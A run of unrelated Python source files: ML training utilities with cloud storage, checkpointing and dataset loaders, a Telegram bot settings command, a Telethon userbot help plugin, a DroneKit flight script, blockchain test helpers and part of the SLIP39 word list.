Catches the exception and returns `False` if upload failed.
"""
from google.cloud import storage # noqa
success = True
if remote_path is None:
remote_path = local_path
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
try:
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
blob.upload_from_filename(local_path, timeout=timeout)
except MemoryError as memory_error:
raise memory_error # You don't want to catch this!!!
except Exception as e:
logging.warning(f'Failed uploading {local_path} to {remote_path}')
logging.warning(f'Caught exception:\n{e}')
success = False
if remove_local:
os.remove(local_path)
return success
def gs_upload_from_dir(local_directory, remote_directory=None, remove_local=True, timeout=480):
if remote_directory is None:
remote_directory = local_directory
for root, _, files in os.walk(local_directory):
for file in files:
local_path = os.path.join(root, file)
remote_path = remote_directory + local_path[len(local_directory):]
remote_path = str.lstrip(remote_path, '/')
gs_upload_from_path(local_path, remote_path, remove_local=remove_local, timeout=timeout)
def gs_download_from_path(local_path, remote_path=None, timeout=480):
from google.cloud import storage # noqa
success = True
if remote_path is None:
remote_path = local_path
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
local_dir = os.path.dirname(local_path)
os.makedirs(local_dir, exist_ok=True)
try:
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
blob.download_to_filename(local_path, timeout=timeout)
except MemoryError as memory_error:
raise memory_error # You don't want to catch this!!!
except Exception as e:
logging.warning(f'Failed downloading {remote_path} to {local_path}')
logging.warning(f'Caught exception:\n{e}')
success = False
return success
def gs_download_from_dir(remote_dir):
from google.cloud import storage # noqa
remote_dir = remote_dir.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_dir = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blobs = bucket.list_blobs(prefix=bucket_dir)
for blob in blobs:
if blob.name.endswith('/'): # Skip folders.
continue
# blob.name: folder/subfolder/file.
tokens = blob.name.split('/')
# Extract `local_dir` and `local_path`.
local_dir_tokens = [bucket_id] + tokens[:-1]
local_dir = os.path.join(*local_dir_tokens)
local_path_tokens = [bucket_id] + tokens
local_path = os.path.join(*local_path_tokens)
os.makedirs(local_dir, exist_ok=True)
blob.download_to_filename(local_path)
def gs_file_exists(remote_path):
from google.cloud import storage # noqa
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
return blob.exists()
def gs_listdir(remote_dir, full_path: Optional[bool] = False):
from google.cloud import storage # noqa
remote_dir = remote_dir.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_dir = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blobs = bucket.list_blobs(prefix=bucket_dir)
if full_path:
return [os.path.join(bucket_id, blob.name) for blob in blobs]
return blobs
# Timer.
class Timer(object):
def __init__(self, msg=None, stream: Optional[Union[str, io.IOBase]] = "stderr", logging=False, level=logging.WARN):
super(Timer, self).__init__()
self.msg = msg
if isinstance(stream, str):
stream = {
"stderr": sys.stderr,
"stdout": sys.stdout
}[stream]
else:
if not isinstance(stream, io.IOBase):
raise ValueError(f"Expected stream of type `io.IOBase`, but found: {type(stream)}")
self.stream = stream # Output stream.
self.logging = logging
self.level = level
def __enter__(self):
self.now = time.perf_counter()
def __exit__(self, exc_type, exc_val, exc_tb):
time_elapse = time.perf_counter() - self.now
msg = f"Time elapse={time_elapse:.6f}"
if self.msg is not None:
msg = f"{self.msg}: " + msg
if self.logging:
logging.log(level=self.level, msg=msg)
else:
print(msg, file=self.stream)
# Disable gc (e.g. for faster pickling).
# https://stackoverflow.com/questions/2766685/how-can-i-speed-up-unpickling-large-objects-if-i-have-plenty-of-ram
class DisableGC(object):
def __init__(self):
super(DisableGC, self).__init__()
def __enter__(self):
gc.disable()
def __exit__(self, exc_type, exc_val, exc_tb):
gc.enable()
# Checkpoint.
def all_ckpts(dir_, sort=True):
# Returns all checkpoint paths in the form of a used-once generator.
file_names = os.listdir(dir_)
file_names = filter(lambda f: f.startswith('global_step_'), file_names)
file_names = filter(lambda f: f.endswith('.ckpt'), file_names)
file_names = map(lambda f: os.path.join(dir_, f), file_names)
if sort: return sort_ckpts(file_names)
return file_names
def sort_ckpts(file_names: Union[map, filter, list]):
# Takes in an iterable (not necessarily a list); returns a list.
if not isinstance(file_names, list):
if not isinstance(file_names, collections.Iterable):
raise ValueError
file_names = list(file_names)
# Avoid in-place ops that have side-effects.
file_names_copy = file_names.copy()
file_names_copy.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
return file_names_copy
def latest_ckpt(dir_, prefix="global_step_", suffix=".ckpt", num_digits=6):
# Returns the path towards the latest ckpt. Returns `None` if no ckpt is found.
# Assumes names are of the format `./parent_dir/global_step_i.ckpt`, where i is the index.
# The prefix "global_step_" and suffix ".ckpt" must *both* be present in the path.
def extract_id(name):
assert isinstance(name, str)
assert name.startswith(prefix) and name.endswith(suffix)
name = name[len(prefix):]
name = name[:-len(suffix)]
return int(name)
file_names = os.listdir(dir_)
file_names = filter(lambda f: f.startswith(prefix), file_names)
file_names = filter(lambda f: f.endswith(suffix), file_names)
idx = map(extract_id, file_names)
idx = list(idx)
if len(idx) == 0:
print(f'Did not find any checkpoints in: {dir_}')
return None
latest_path = os.path.join(dir_, f'{prefix}{max(idx):0{num_digits}d}{suffix}')
return latest_path
def save_ckpt(
path: str,
model: nn.Module,
optimizer: Optional[optim.Optimizer] = None,
scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,
additional_state_dicts: Optional[Dict] = None, # Other state_dicts you might want to include.
cloud_storage=False, # cloud_storage is the legacy argument.
to_gcs=False,
):
# model, optimizer, scheduler are special parameters.
os.makedirs(os.path.dirname(path), exist_ok=True)
state_dicts = {
"model": model.state_dict(),
"optimizer": None if optimizer is None else optimizer.state_dict(),
"scheduler": None if scheduler is None else scheduler.state_dict(),
}
if additional_state_dicts is not None:
for key, value in additional_state_dicts:
state_dicts[key] = value
# Save and upload.
torch.save(state_dicts, path)
if cloud_storage or to_gcs:
gs_upload_from_path(path)
def load_ckpt(
path: str,
model: nn.Module,
optimizer: Optional[optim.Optimizer] = None,
scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,
additional_state_objects: Optional[Dict] = None,
verbose=True,
):
if verbose:
logging.warning(f'Loading checkpoint from {path}')
state_dicts = torch.load(path)
model.load_state_dict(state_dicts['model'])
if optimizer is not None:
optimizer.load_state_dict(state_dicts['optimizer'])
if scheduler is not None:
scheduler.load_state_dict(state_dicts['scheduler'])
if additional_state_objects is not None:
for key, value in additional_state_objects:
value.load_state_dict(state_dicts["key"])
# Data.
def get_data_stats(data_name):
if data_name == "cifar10":
input_size = (3, 32, 32)
classes = 10
elif data_name == "cifar100":
input_size = (3, 32, 32)
classes = 100
elif data_name in ("mnist", "kmnist", "fmnist"):
input_size = (1, 28, 28)
classes = 10
elif data_name == "svhn":
input_size = (3, 32, 32)
classes = 10
elif data_name in ("imagenet32", "imagenet64", "celebahq", "celeba_5bit"):
input_size = (3, 32, 32)
classes = None
else:
raise ValueError(f"Unknown data: {data_name}")
return {"input_size": input_size, "classes": classes}
def dequantize(x, nvals=256):
"""[0, 1] -> [0, nvals] -> add uniform noise -> [0, 1]"""
noise = x.new().resize_as_(x).uniform_()
x = x * (nvals - 1) + noise
x = x / nvals
return x
def get_loader(data_name,
root=None,
train_batch_size=128,
test_batch_size=1024,
pin_memory=True,
num_workers=8,
train_transform=None,
test_transform=None,
train_target_transform=None,
test_target_transform=None,
drop_last=True,
shuffle=True,
data_aug=True,
padding_mode="constant",
task="density",
**kwargs):
import torchvision as tv
if task not in ("density", "classification", "hybrid"):
raise ValueError(f"Unknown task: {task}. Expected one of `density`, `classification`, `hybrid`.")
logging.warning(f"Creating loaders for data: {data_name}, task: {task}")
if root is None:
root = os.path.join(os.path.expanduser("~"), 'data')
os.makedirs(root, exist_ok=True)
if data_name in ('cifar10', 'cifar100'):
if data_name == 'cifar10':
mean, std = (0.4914, 0.4822, 0.4465), (0.2471, 0.2435, 0.2616)
else:
mean, std = (0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if data_name == 'cifar10':
train_data = tv.datasets.CIFAR10(
root, transform=train_transform, target_transform=train_target_transform, train=True, download=True
)
test_data = tv.datasets.CIFAR10(
root, transform=test_transform, target_transform=test_target_transform, train=False, download=True
)
else:
train_data = tv.datasets.CIFAR100(
root, transform=train_transform, target_transform=train_target_transform, train=True, download=True
)
test_data = tv.datasets.CIFAR100(
root, transform=test_transform, target_transform=test_target_transform, train=False, download=True
)
elif data_name == "svhn":
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.ToTensor(),
])
else:
train_transform = tv.transforms.Compose([tv.transforms.ToTensor()])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
train_data = tv.datasets.SVHN(
root, transform=train_transform, target_transform=train_target_transform, split='train', download=True
)
test_data = tv.datasets.SVHN(
root, transform=test_transform, target_transform=test_target_transform, split='test', download=True
)
elif data_name in ('mnist', 'kmnist', 'fmnist'):
if train_transform is None:
if task in ("classification", "hybrid"):
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if data_name == "mnist":
train_data = tv.datasets.MNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.MNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
elif data_name == "kmnist": # `kmnist`
train_data = tv.datasets.KMNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.KMNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
else: # `fmnist`
train_data = tv.datasets.FashionMNIST(
root, train=True, transform=train_transform, target_transform=train_target_transform, download=True
)
test_data = tv.datasets.FashionMNIST(
root, train=False, transform=test_transform, target_transform=test_target_transform, download=True
)
elif data_name in ("cinic10", "cinic"):
# Statistics from https://github.com/BayesWatch/cinic-10#data-loading
mean, std = (0.47889522, 0.47227842, 0.43047404), (0.24205776, 0.23828046, 0.25874835)
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
# A bunch of hard-coded stuff that doesn't work if no access to bucket.
cinic_path = os.path.join(root, 'cinic-10')
if not os.path.exists(cinic_path):
cinic_link = "https://datashare.is.ed.ac.uk/bitstream/handle/10283/3192/CINIC-10.tar.gz"
os.system(f'wget -P {root} {cinic_link} --no-check-certificate')
os.system(f'tar -xf {root}/CINIC-10.tar.gz')
# Exclude the CIFAR-10 part in CINIC-10, since it's a hybrid of the original CIFAR-10 and Imagenet!
if kwargs.get('exclude_cifar', False):
is_valid_file = lambda _path: 'cifar10' not in _path
else:
is_valid_file = None
train_data = tv.datasets.ImageFolder(
os.path.join(cinic_path, 'train'),
transform=train_transform, target_transform=train_target_transform, is_valid_file=is_valid_file
)
test_data = tv.datasets.ImageFolder(
os.path.join(cinic_path, 'test'),
transform=test_transform, target_transform=test_target_transform, is_valid_file=is_valid_file
)
else:
raise NotImplementedError(f"Unknown dataset: {data_name}.")
train_loader = data.DataLoader(
train_data,
batch_size=train_batch_size,
drop_last=drop_last,
shuffle=shuffle,
pin_memory=pin_memory,
num_workers=num_workers
)
test_loader = data.DataLoader(
test_data,
batch_size=test_batch_size,
drop_last=False,
shuffle=False,
pin_memory=pin_memory,
num_workers=num_workers
)
return train_loader, test_loader
def count_examples(loader: data.DataLoader):
"""Count the number of examples in a dataloader."""
count = 0
for batch in loader:
unpacked = batch
while not torch.is_tensor(unpacked):
unpacked = unpacked[0]
count += unpacked.size(0)
return count
class InfiniteLoader(object):
"""Wraps an existing loader so that it outputs stuff indefinitely; useful for semi-supervised learning."""
def __init__(self, loader: data.DataLoader):
super(InfiniteLoader, self).__init__()
self.loader = loader
self.iterator = iter(loader)
def __next__(self):
try:
return next(self.iterator)
except StopIteration:
self.iterator = iter(self.loader)
return next(self.iterator)
def get_ema_avg_fn(gamma=0.999):
def ema_avg_fn(averaged_model_parameter, model_parameter, num_averaged):
"""Used for `torch.optim.swa_utils.AveragedModel`."""
return gamma * averaged_model_parameter + (1. - gamma) * model_parameter
return ema_avg_fn
class Comparator(object):
def __init__(self, highest=True):
super(Comparator, self).__init__()
self._highest = highest
self._best = (-sys.maxsize) if highest else sys.maxsize
self._aux = {}
def step(self, x, **kwargs) -> bool:
"""Update the internal state if `x` is better than the best recorded so far.
Keyword Args are used to record auxiliary information.
Returns:
True if the internal state is updated; False otherwise.
"""
if self._highest and x <= self._best:
return False
if not self._highest and x >= self._best:
return False
self._best = x
self._aux = kwargs
return True
@property
def val(self):
return self._best, self._aux
class EarlyStopper(object):
"""An object that helps with early stopping."""
def __init__(self, patience, want_max=True):
super(EarlyStopper, self).__init__()
self.patience = patience
self.want_max = want_max
self.flat_cnt = 0
best = sys.maxsize
if want_max:
best = -best
self.best = best
def step(self, val) -> bool:
"""Given the current metric, return if the loop should break."""
if self.patience is None:
return False
if self.want_max:
if val <= self.best:
self.flat_cnt += 1
if self.flat_cnt >= self.patience:
return True
else:
self.best = val
self.flat_cnt = 0
else:
if val >= self.best:
self.flat_cnt += 1
if self.flat_cnt >= self.patience:
return True
else:
self.best = val
self.flat_cnt = 0
return False
# Misc log sanitization.
def early_stopping(global_steps: list, metrics: list, tolerance: int, ascending: bool):
"""Find the index s.t. quant is best.
Searches sequentially and stops when the traversed global steps in `gs` passes `tolerance` level.
Args:
global_steps: A list of global steps.
metrics: A list of validation metrics.
tolerance: The max number of steps before searching is stopped.
ascending: Finds max metric if True; else finds the min.
Returns:
An integer index for the best position.
"""
assert all(i > j for i, j in zip_(global_steps[1:], global_steps[:-1])), "`global_steps` is not increasing."
counts = 0 # The number of impatient steps.
best = metrics[0]
global_step_prev = global_steps[0]
for i, (global_step, metric) in enumerate(
zip_(global_steps[1:], metrics[1:])
):
if ascending:
if metric <= best:
counts += (global_step - global_step_prev)
if counts >= tolerance:
break
else:
best = metric
counts = 0
else:
if metric >= best:
counts += (global_step - global_step_prev)
if counts >= tolerance:
break
else:
best = metric
counts = 0
global_step_prev = global_step
return metrics.index(best)
# Convenience aliases.
write_argparse = write_config
load_argparse = load_config
count_tensor_or_tensors_size = count_tensor_list_size
# Safe math operations.
def exp_(x):
try:
ans = math.exp(x)
except OverflowError:
ans = float('inf')
return ans
# Run on cloud.
def extract_argument(cmd: str, arg="--train_dir"):
lo = cmd.find(arg)
start = lo + len(arg)
end = None # Until the last.
for index in range(start, len(cmd) - 1):
if cmd[index:index + 2] == '--':
end = index
break
return cmd[start:end].strip()
def gpu_scheduler(
commands: Sequence[str],
wait_time_in_secs: int = 180,
log=True,
maxMemory=1e-4,
maxLoad=1e-4,
excludeID=(),
excludeUUID=()
):
"""Schedule jobs on a VM with several GPUs.
Args:
commands: Sequence of strings. Each string is a command of the format:
python -m <script> <args>
Notes:
1) This command shouldn't contain CUDA_VISIBLE_DEVICES, since it gets added in this function.
2) It is the responsibility of each command to get the wait/no wait right!
wait_time_in_secs: The number of seconds to wait before scheduling the next job.
It's always good to wait for a bit, since a job might not immediately start running a GPU.
log: Write all logs to `train_dir/log.out` if True. So assumes command has `--train_dir` argument.
"""
print(f'Scheduling {len(commands)} jobs...')
import GPUtil
import subprocess
procs = []
for job_id, command in enumerate(commands):
empty_gpus = []
while len(empty_gpus) == 0:
# Don't use `getFirstAvailable`; it is very bad since it throws RuntimeError when no GPU is found.
empty_gpus = GPUtil.getAvailable(
order='first',
maxLoad=maxLoad,
maxMemory=maxMemory,
limit=1,
excludeID=excludeID,
excludeUUID=excludeUUID,
)
time.sleep(1)
print(f'empty gpus: {empty_gpus}')
gpu_id = empty_gpus[0]
command = f"export CUDA_VISIBLE_DEVICES={gpu_id}; {command}"
command = command.strip() # Need this strip to remove new line char.
if log and '--train_dir' in command:
# Get argument for `train_dir`.
train_dir = extract_argument(command)
log_path = os.path.join(train_dir, 'log.out')
command += f" > {log_path} 2>&1 "
command = f"mkdir -p {train_dir}; \n{command}"
# This doesn't wait.
proc = subprocess.Popen(
[command],
shell=True, stdin=None, stdout=None, stderr=None, close_fds=True
)
procs.append(proc)
print('command: ')
print(command)
print(f'scheduled job: {job_id} on gpu: {gpu_id}')
# Give the program some time to be located on the GPU, before scheduling the next.
time.sleep(wait_time_in_secs)
return procs
|
from telegram import Update
from telegram.ext import CallbackContext, CommandHandler
from bot.settings import settings
from bot.utils import get_log
from ._utils import require_owner
log = get_log(__name__)
@require_owner
def command(update: Update, context: CallbackContext):
log.debug('Taken command `settings`')
update.message.reply_markdown('Current VK configuration:\n\n'
f'`APP ID: {settings.VK_APP_ID}`\n'
f'`Group ID: {settings.VK_WALL_ID}`\n'
f'`Access Token: {settings.VK_APP_TOKEN}`\n\n'
'Call /config to update it.')
handler = CommandHandler('settings', command)
|
from telethon.errors.rpcerrorlist import BotInlineDisabledError as noinline
from telethon.errors.rpcerrorlist import YouBlockedUserError
from telethon.tl.functions.contacts import UnblockRequest
from userbot import BOT_USERNAME
from userbot import CMD_HANDLER as cmd
from userbot import bot
from userbot.utils import edit_or_reply, man_cmd
@man_cmd(pattern="helpme")
async def _(event):
if event.fwd_from:
return
if BOT_USERNAME is not None:
chat = "@Botfather"
try:
results = await event.client.inline_query(BOT_USERNAME, "@MikooUserbot")
await results[0].click(
event.chat_id, reply_to=event.reply_to_msg_id, hide_via=True
)
await event.delete()
except noinline:
xx = await edit_or_reply(
event,
"**Inline Mode Tidak aktif.**\n__Sedang Menyalakannya, Harap Tunggu Sebentar...__",
)
async with bot.conversation(chat) as conv:
try:
first = await conv.send_message("/setinline")
second = await conv.get_response()
third = await conv.send_message(BOT_USERNAME)
fourth = await conv.get_response()
fifth = await conv.send_message("Search")
sixth = await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
except YouBlockedUserError:
await event.client(UnblockRequest(chat))
first = await conv.send_message("/setinline")
second = await conv.get_response()
third = await conv.send_message(BOT_USERNAME)
fourth = await conv.get_response()
fifth = await conv.send_message("Search")
sixth = await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await xx.edit(
f"**Berhasil Menyalakan Mode Inline**\n\n**Ketik** `{cmd}helpme` **lagi untuk membuka menu bantuan.**"
)
await bot.delete_messages(
conv.chat_id,
[first.id, second.id, third.id, fourth.id, fifth.id, sixth.id],
)
else:
await edit_or_reply(
event,
"**Silahkan Buat BOT di @BotFather dan Tambahkan Var** `BOT_TOKEN` & `BOT_USERNAME`",
)
|
##########DEPENDENCIES#############
from dronekit import connect, VehicleMode,LocationGlobalRelative,APIException
import time
import socket
#import exceptions
import math
import argparse
from pymavlink import mavutil
#########FUNCTIONS#################
def connectMyCopter():
parser = argparse.ArgumentParser(description='commands')
parser.add_argument('--connect')
args = parser.parse_args()
connection_string = args.connect
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
vehicle = connect(connection_string,wait_ready=True)
return vehicle
def arm_and_takeoff(targetHeight):
while vehicle.is_armable!=True:
print("Waiting for vehicle to become armable.")
time.sleep(1)
print("Vehicle is now armable")
vehicle.mode = VehicleMode("GUIDED")
while vehicle.mode!='GUIDED':
print("Waiting for drone to enter GUIDED flight mode")
time.sleep(1)
print("Vehicle now in GUIDED MODE. Have fun!!")
vehicle.armed = True
while vehicle.armed==False:
print("Waiting for vehicle to become armed.")
time.sleep(1)
print("Look out! Virtual props are spinning!!")
vehicle.simple_takeoff(targetHeight) ##meters
while True:
print("Current Altitude: %d"%vehicle.location.global_relative_frame.alt)
if vehicle.location.global_relative_frame.alt>=.92*targetHeight:
break
time.sleep(1)
print("Target altitude reached!!")
return None
##Send a velocity command with +x being the heading of the drone.
def send_local_ned_velocity(vx, vy, vz):
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0,
0, 0,
mavutil.mavlink.MAV_FRAME_BODY_OFFSET_NED,
0b0000111111000111,
0, 0, 0,
vx, vy, vz,
0, 0, 0,
0, 0)
vehicle.send_mavlink(msg)
vehicle.flush()
##Send a velocity command with +x being the heading of the drone.
def send_global_ned_velocity(vx, vy, vz):
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_LOCAL_NED, #frame
0b0000111111000111, #type_mask (only speeds enabled)
0, 0, 0, # x, y, z positions (not used)
vx, vy, vz, # x, y, z velocity in m/s
0, 0, 0, #x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) #yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
vehicle.send_mavlink(msg)
vehicle.flush()
##########MAIN EXECUTABLE###########
vehicle = connectMyCopter()
arm_and_takeoff(10)
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(2,0,0)
time.sleep(1)
print("Moving NORTH relative to front of drone")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,-2,0)
time.sleep(1)
print("Moving WEST relative to front of drone")
counter=counter+1
time.sleep(2)
while counter<5:
send_global_ned_velocity(2,0,0)
time.sleep(1)
print("Moving TRUE NORTH relative to front of drone")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_global_ned_velocity(0,-2,0)
time.sleep(1)
print("Moving TRUE WEST relative to front of drone")
counter=counter+1
#########UP AND DOWN############
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,0,-2)
time.sleep(1)
print("Moving UP")
counter=counter+1
time.sleep(2)
counter=0
while counter<5:
send_local_ned_velocity(0,0,2)
time.sleep(1)
print("Moving DOWN")
counter=counter+1
|
import pytest
from types import SimpleNamespace
from sovtoken.test.helpers.helper_inner_general import HelperInnerGeneral
from sovtoken.test.helpers.helper_inner_request import HelperInnerRequest
from sovtoken.test.helpers.helper_inner_wallet import HelperInnerWallet
from .helper_general import HelperGeneral
from .helper_node import HelperNode
from .helper_request import HelperRequest
from .helper_sdk import HelperSdk
from .helper_wallet import HelperWallet
def form_helpers(
txn_pool_node_set,
looper,
pool_handle,
trustee_wallets,
steward_wallets,
sdk_wallet_client,
sdk_wallet_steward,
sdk_wallet_handle,
sdk_trustees,
sdk_stewards
):
helper_node = HelperNode(txn_pool_node_set)
helper_sdk = HelperSdk(
looper,
pool_handle,
txn_pool_node_set,
sdk_wallet_steward
)
helper_inner_wallet = HelperInnerWallet(
looper,
sdk_wallet_client,
trustee_wallets,
steward_wallets
)
helper_wallet = HelperWallet(
looper,
sdk_wallet_client,
trustee_wallets,
steward_wallets,
sdk_wallet_handle,
sdk_trustees,
sdk_stewards
)
helper_requests = HelperRequest(
helper_wallet,
helper_sdk,
looper,
sdk_wallet_client,
sdk_wallet_steward
)
helper_general = HelperGeneral(helper_sdk, helper_wallet, helper_requests, helper_node)
helper_inner_wallet = HelperInnerWallet(
looper,
sdk_wallet_client,
trustee_wallets,
steward_wallets
)
helper_inner_requests = HelperInnerRequest(
helper_inner_wallet,
helper_sdk,
looper,
sdk_wallet_client,
sdk_wallet_steward
)
helper_inner_general = HelperInnerGeneral(helper_sdk, helper_inner_wallet, helper_inner_requests)
helpers = {
'inner': SimpleNamespace(**{
'general': helper_inner_general,
'request': helper_inner_requests,
'wallet': helper_inner_wallet,
}),
'general': helper_general,
'request': helper_requests,
'wallet': helper_wallet,
'sdk': helper_sdk,
'node': helper_node,
}
return SimpleNamespace(**helpers)
|
SLIP39_WORDS = [
"academic",
"acid",
"acne",
"acquire",
"acrobat",
"activity",
"actress",
"adapt",
"adequate",
"adjust",
"admit",
"adorn",
"adult",
"advance",
"advocate",
"afraid",
"again",
"agency",
"agree",
"aide",
"aircraft",
"airline",
"airport",
"ajar",
"alarm",
"album",
"alcohol",
"alien",
"alive",
"alpha",
"already",
"alto",
"aluminum",
"always",
"amazing",
"ambition",
"amount",
"amuse",
"analysis",
"anatomy",
"ancestor",
"ancient",
"angel",
"angry",
"animal",
"answer",
"antenna",
"anxiety",
"apart",
"aquatic",
"arcade",
"arena",
"argue",
"armed",
"artist",
"artwork",
"aspect",
"auction",
"august",
"aunt",
"average",
"aviation",
"avoid",
"award",
"away",
"axis",
"axle",
"beam",
"beard",
"beaver",
"become",
"bedroom",
"behavior",
"being",
"believe",
"belong",
"benefit",
"best",
"beyond",
"bike",
"biology",
"birthday",
"bishop",
"black",
"blanket",
"blessing",
"blimp",
"blind",
"blue",
"body",
"bolt",
"boring",
"born",
"both",
"boundary",
"bracelet",
"branch",
"brave",
"breathe",
"briefing",
"broken",
"brother",
"browser",
"bucket",
"budget",
"building",
"bulb",
"bulge",
"bumpy",
"bundle",
"burden",
"burning",
"busy",
"buyer",
"cage",
"calcium",
"camera",
"campus",
"canyon",
"capacity",
"capital",
"capture",
"carbon",
"cards",
"careful",
"cargo",
"carpet",
"carve",
"category",
"cause",
"ceiling",
"center",
"ceramic",
"champion",
"change",
"charity",
"check",
"chemical",
"chest",
"chew",
"chubby",
"cinema",
"civil",
"class",
"clay",
"cleanup",
"client",
"climate",
"clinic",
"clock",
"clogs",
"closet",
"clothes",
"club",
"cluster",
"coal",
"coastal",
"coding",
"column",
"company",
"corner",
"costume",
"counter",
"course",
"cover",
"cowboy",
"cradle",
"craft",
"crazy",
"credit",
"cricket",
"criminal",
"crisis",
"critical",
"crowd",
"crucial",
"crunch",
"crush",
"crystal",
"cubic",
"cultural",
"curious",
"curly",
"custody",
"cylinder",
"daisy",
"damage",
"dance",
"darkness",
"database",
"daughter",
"deadline",
"deal",
"debris",
"debut",
"decent",
"decision",
"declare",
"decorate",
"decrease",
"deliver",
"demand",
"density",
"deny",
"depart",
"depend",
"depict",
"deploy",
"describe",
"desert",
"desire",
"desktop",
"destroy",
"detailed",
"detect",
"device",
"devote",
"diagnose",
"dictate",
"diet",
"dilemma",
"diminish",
"dining",
"diploma",
"disaster",
"discuss",
"disease",
"dish",
"dismiss",
"display",
"distance",
"dive",
"divorce",
"document",
"domain",
"domestic",
"dominant",
"dough",
"downtown",
"dragon",
"dramatic",
"dream",
"dress",
"drift",
"drink",
"drove",
"drug",
"dryer",
"duckling",
"duke",
"duration",
"dwarf",
"dynamic",
"early",
"earth",
"easel",
"easy",
"echo",
"eclipse",
"ecology",
"edge",
"editor",
"educate",
"either",
"elbow",
"elder",
"election",
"elegant",
"element",
"elephant",
"elevator",
"elite",
"else",
"email",
"emerald",
"emission",
"emperor",
"emphasis",
"employer",
"empty",
"ending",
"endless",
"endorse",
"enemy",
"energy",
"enforce",
"engage",
"enjoy",
"enlarge",
"entrance",
"envelope",
"envy",
"epidemic",
"episode",
"equation",
"equip",
"eraser",
"erode",
"escape",
"estate",
"estimate",
"evaluate",
"evening",
"evidence",
"evil",
"evoke",
"exact",
"example",
"exceed",
"exchange",
"exclude",
"excuse",
"execute",
"exercise",
"exhaust",
"exotic",
"expand",
"expect",
"explain",
"express",
"extend",
"extra",
"eyebrow",
"facility",
"fact",
"failure",
"faint",
"fake",
"false",
"family",
"famous",
